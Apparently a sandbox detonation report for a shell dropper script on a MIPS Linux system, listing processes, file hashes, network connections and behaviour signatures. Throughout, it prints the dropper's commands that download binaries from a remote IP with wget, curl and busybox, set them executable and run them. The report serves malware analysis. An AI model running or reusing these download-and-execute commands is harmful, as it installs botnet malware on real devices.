[./DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/bin/rm

[rm DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/usr/bin/wget

[wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/bin/chmod

[chmod 777 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m

[./8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/bin/rm

[rm 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/usr/bin/wget

[wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/bin/chmod

[chmod 777 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q

[./LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/bin/rm

[rm LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/usr/bin/wget

[wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/bin/chmod

[chmod 777 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM

[./ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/bin/rm

[rm ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/usr/bin/wget

[wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/bin/chmod

[chmod 777 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv

[./Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/bin/rm

[rm Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/usr/bin/wget

[wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/bin/chmod

[chmod 777 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy

[./RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/bin/rm

[rm RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/usr/bin/wget

[wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/bin/chmod

[chmod 777 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj

[./DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/bin/rm

[rm DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/usr/bin/wget

[wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/bin/chmod

[chmod 777 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI

[./3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/bin/rm

[rm 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/usr/bin/wget

[wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/bin/chmod

[chmod 777 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh

[./6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/bin/rm

[rm 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/usr/bin/wget

[wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/792-1-0xb66c4000-0xb66d5044-memory.dmp

memory/844-2-0xb674a000-0xb675b044-memory.dmp

memory/859-3-0xb676c000-0xb677d044-memory.dmp

memory/865-4-0xb66f1000-0xb6702044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-24 02:06

Reported

2024-11-24 02:09

Platform

debian9-mipsbe-20240729-en

Max time kernel

119s

Max time network

122s

Command Line

[/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ N/A
N/A /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT N/A
N/A /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s N/A
N/A /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 N/A
N/A /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk N/A
N/A /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m N/A
N/A /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q N/A
N/A /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM N/A
N/A /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 N/A
N/A /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv N/A
N/A /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj N/A
N/A /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI N/A
N/A /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh N/A
N/A /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy N/A
N/A /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 N/A
N/A /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk N/A
N/A /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m N/A
N/A /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q N/A
N/A /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM N/A
N/A /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv N/A
N/A /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy N/A
N/A /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj N/A
N/A /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI N/A
N/A /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh N/A
N/A /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 N/A
N/A /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ N/A
N/A /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT N/A
N/A /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj /usr/bin/curl N/A
File opened for modification /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM /usr/bin/curl N/A
File opened for modification /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh /usr/bin/curl N/A
File opened for modification /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q /usr/bin/curl N/A
File opened for modification /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv /usr/bin/curl N/A
File opened for modification /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 /usr/bin/curl N/A
File opened for modification /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI /usr/bin/curl N/A
File opened for modification /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ /usr/bin/curl N/A
File opened for modification /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 /usr/bin/curl N/A
File opened for modification /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk /usr/bin/curl N/A
File opened for modification /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy /usr/bin/curl N/A
File opened for modification /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk /usr/bin/curl N/A
File opened for modification /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj /usr/bin/curl N/A
File opened for modification /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM /usr/bin/curl N/A
File opened for modification /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv /usr/bin/curl N/A
File opened for modification /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 /usr/bin/curl N/A
File opened for modification /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m /usr/bin/curl N/A
File opened for modification /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT /usr/bin/curl N/A
File opened for modification /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT /usr/bin/curl N/A
File opened for modification /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s /usr/bin/curl N/A
File opened for modification /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy /usr/bin/curl N/A
File opened for modification /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI /usr/bin/curl N/A
File opened for modification /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ /usr/bin/curl N/A
File opened for modification /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s /usr/bin/curl N/A
File opened for modification /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m /usr/bin/curl N/A
File opened for modification /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q /usr/bin/curl N/A
File opened for modification /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 /usr/bin/curl N/A
File opened for modification /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh /usr/bin/curl N/A

Processes

/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh

[/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/bin/chmod

[chmod 777 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ

[./fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/bin/rm

[rm fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/usr/bin/wget

[wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/bin/chmod

[chmod 777 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT

[./7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/bin/rm

[rm 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/usr/bin/wget

[wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/bin/chmod

[chmod 777 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s

[./3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/bin/rm

[rm 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/usr/bin/wget

[wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/bin/chmod

[chmod 777 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4

[./RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/bin/rm

[rm RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/usr/bin/wget

[wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/bin/chmod

[chmod 777 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk

[./DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/bin/rm

[rm DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/usr/bin/wget

[wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/bin/chmod

[chmod 777 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m

[./8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/bin/rm

[rm 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/usr/bin/wget

[wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/bin/chmod

[chmod 777 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q

[./LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/bin/rm

[rm LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/usr/bin/wget

[wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/bin/chmod

[chmod 777 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM

[./ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/bin/rm

[rm ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/usr/bin/wget

[wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/bin/chmod

[chmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5

[./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/bin/rm

[rm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/usr/bin/wget

[wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/bin/chmod

[chmod 777 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv

[./Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/bin/rm

[rm Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/usr/bin/wget

[wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/bin/chmod

[chmod 777 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj

[./DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/bin/rm

[rm DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/usr/bin/wget

[wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/bin/busybox

